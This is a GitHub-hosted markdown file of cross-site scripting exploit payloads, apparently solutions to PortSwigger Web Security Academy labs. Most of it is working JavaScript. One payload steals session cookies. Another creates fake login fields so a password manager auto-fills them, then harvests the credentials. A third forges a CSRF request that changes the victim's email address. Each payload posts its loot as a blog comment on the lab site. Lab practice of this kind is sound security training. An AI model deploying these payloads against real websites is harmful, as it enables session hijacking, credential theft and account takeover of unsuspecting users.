Skip to content

Latest commit

 

History

History
73 lines (60 loc) · 2.96 KB

XSS-exploits.md

File metadata and controls

73 lines (60 loc) · 2.96 KB

Cross-site scripting (exploits)

Note: Update the base URL https://ac741f481eba7f5d80a83ee7003a00d0.web-security-academy.net/ to match yours!

Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed.

Exploiting cross-site scripting to steal cookies

Stealing cookies is a traditional way to exploit XSS. Most web applications use cookies for session handling. You can exploit cross-site scripting vulnerabilities to send the victim's cookies to your own domain, then manually inject the cookies into your browser and impersonate the victim.

<script>
window.onload = function(e) {
    var csrf = document.getElementsByName("csrf")[0].value;
    console.log(csrf);
    fetch('https://ac6b1f801e21e609805034f000bf00b3.web-security-academy.net/post/comment', {
        method: 'POST',
        body: 'csrf=' + csrf + '&postId=1&comment=Cookie: ' + document.cookie + '&name=Jan&email=admin%40cmdnctrl.net&website='
    });
};
</script>

Exploiting cross-site scripting to capture passwords

These days, many users have password managers that auto-fill their passwords. You can take advantage of this by creating a password input, reading out the auto-filled password, and sending it to your own domain. This technique avoids most of the problems associated with stealing cookies, and can even gain access to every other account where the victim has reused the same password.

<form><input type="text" id="username" name="username"></form>
<form><input type="password" id="password" name="password"></form>
<script>
window.onload = function(e) {
    setTimeout(function() {
        var csrf = document.getElementsByName("csrf")[0].value;
        var username = document.getElementById("username").value;
        var passw = document.getElementById("password").value;
        console.log(csrf);
        fetch('https://ac741f481eba7f5d80a83ee7003a00d0.web-security-academy.net/post/comment', {
            method: 'POST',
            body: 'csrf=' + csrf + '&postId=3&comment=Username: ' + username + ', Password: ' + passw + '&name=Jan&email=admin%40cmdnctrl.net&website='
        });
    }, 2500);
};
</script>

Exploiting cross-site scripting to perform CSRF

Anything a legitimate user can do on a web site, you can probably do too with XSS. Depending on the site you're targeting, you might be able to make a victim send a message, accept a friend request, commit a backdoor to a source code repository, or transfer some Bitcoin.

<script>
window.onload = function(e) {
    var csrf = document.getElementsByName("csrf")[0].value;
    console.log(csrf);
    fetch('https://ac8e1fe31e1017ee80982bb700310061.web-security-academy.net/email/change', {
        method: 'POST',
        body: 'csrf=' + csrf + '&email=john@wick.com'
    });
};
</script>